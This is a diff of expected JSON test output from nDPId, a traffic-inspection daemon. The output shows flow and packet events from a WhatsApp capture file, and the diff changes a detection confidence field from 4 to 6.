{"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655051220512,"flow_last_seen":1655051220729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45470,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655051794002,"flow_last_seen":1655051794206,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45602,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655049443230,"flow_last_seen":1655049443593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46406,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655050704430,"flow_last_seen":1655050704962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.83.49","src_port":40224,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655059510580,"flow_last_seen":1655059510611,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655059510611,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":39828,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655051492307,"flow_last_seen":1655051493108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43084,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655051220512,"flow_last_seen":1655051220729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45470,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655051794002,"flow_last_seen":1655051794206,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45602,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655049443230,"flow_last_seen":1655049443593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46406,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655050704430,"flow_last_seen":1655050704962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.83.49","src_port":40224,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":241,"packets-processed":240,"total-skipped-flows":0,"total-l4-payload-len":20954,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":30,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":30,"total-idle-flows":23,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":198,"global_ts_msec":1655060495977} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655060495977,"flow_last_seen":1655060495977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655060495977,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40108,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1655060495977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655060495977,"pkt":"eJS0JASgYDjgxTWgCABFAAA8YJ5AAD8GobPAqAJkszzDIZysFGYCJGGJAAAAAKAC\/\/+p9wAAAgQFtAQCCAoFq0oxAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1655060496008,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655060496008,"pkt":"eJS0JASgYDjgxTWgCABFAAA0YJ9AAD8GobrAqAJkszzDIZysFGYCJGGK2sw1x4AQAKwONAAAAQEICgWrSlDEovR\/"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1655060496009,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655060496009,"pkt":"eJS0JASgYDjgxTWgCABFAAA4YKBAAD8GobXAqAJkszzDIZysFGYCJGGK2sw1x4AYAKzI4QAAAQEICgWrSlHEovR\/RUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655060495977,"flow_last_seen":1655060496009,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655060496009,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40108,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655052148615,"flow_last_seen":1655052148966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655060496256,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655052853504,"flow_last_seen":1655052853872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655060496256,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655052438619,"flow_last_seen":1655052438807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655060496256,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46042,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655060495977,"flow_last_seen":1655060496009,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655060496009,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40108,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655052148615,"flow_last_seen":1655052148966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655060496256,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655052853504,"flow_last_seen":1655052853872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655060496256,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655052438619,"flow_last_seen":1655052438807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655060496256,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46042,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":250,"packets-processed":249,"total-skipped-flows":0,"total-l4-payload-len":22271,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":31,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":31,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":207,"global_ts_msec":1655061657436} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655061657436,"flow_last_seen":1655061657436,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655061657436,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43954,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1655061657436,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655061657436,"pkt":"eJS0JASgYDjgxTWgCABFAAA88nlAAD8GD8jAqAJkszzDMauyFGbsqzKiAAAAAKAC\/\/9iSAAAAgQFtAQCCAo4IpSyAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1655061657568,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655061657568,"pkt":"eJS0JASgYDjgxTWgCABFAAA08npAAD8GD8\/AqAJkszzDMauyFGbsqzKjnK08DIAQAIBE+AAAAQEICjgilXAR0WBF"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1655061657568,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655061657568,"pkt":"eJS0JASgYDjgxTWgCABFAAA48ntAAD8GD8rAqAJkszzDMauyFGbsqzKjnK08DIAYAID\/ogAAAQEICjgilXQR0WBFRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655061657436,"flow_last_seen":1655061657706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655061657706,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43954,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":258,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655053633670,"flow_last_seen":1655053633932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655061657966,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43230,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655061657436,"flow_last_seen":1655061657706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655061657706,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43954,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":258,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655053633670,"flow_last_seen":1655053633932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655061657966,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43230,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655061873005,"flow_last_seen":1655061873005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655061873005,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.93.54","src_port":49096,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1655061873005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655061873005,"pkt":"eJS0JASgYDjgxTWgCABFAAA8rKJAAD8GT8rAqAJkHw1dNr\/IFGZDXSW2AAAAAKAC\/\/\/P8AAAAgQFtAQCCAokHtddAAAAAAEDAwk="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1655061873153,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655061873153,"pkt":"eJS0JASgYDjgxTWgCABFAAA0rKNAAD8GT9HAqAJkHw1dNr\/IFGZDXSW3fPQug4AQAID6IQAAAQEICiQe1\/I8Thuy"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1655061873186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655061873186,"pkt":"eJS0JASgYDjgxTWgCABFAAA4rKRAAD8GT8zAqAJkHw1dNr\/IFGZDXSW3fPQug4AYAIC0sAAAAQEICiQe2BI8ThuyRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655061873005,"flow_last_seen":1655061873368,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655061873368,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.93.54","src_port":49096,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655061873005,"flow_last_seen":1655061873368,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655061873368,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.93.54","src_port":49096,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":266,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":266,"packets-processed":265,"total-skipped-flows":0,"total-l4-payload-len":23230,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":33,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":33,"total-idle-flows":27,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":219,"global_ts_msec":1655062569330} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655062569330,"flow_last_seen":1655062569330,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655062569330,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43978,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1655062569330,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655062569330,"pkt":"eJS0JASgYDjgxTWgCABFAAA8MZZAAD8G0KvAqAJkszzDMavKFGbYH58HAAAAAKAC\/\/9yPQAAAgQFtAQCCAo4IyzLAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1655062569374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655062569374,"pkt":"eJS0JASgYDjgxTWgCABFAAA0MZdAAD8G0LLAqAJkszzDMavKFGbYH58IMQLbuIAQAIC6CgAAAQEICjgjLRYTN8Yz"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1655062569381,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655062569381,"pkt":"eJS0JASgYDjgxTWgCABFAAA4MZhAAD8G0K3AqAJkszzDMavKFGbYH58IMQLbuIAYAIB0sgAAAQEICjgjLR0TN8YzRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655062569330,"flow_last_seen":1655062569427,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655062569427,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43978,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 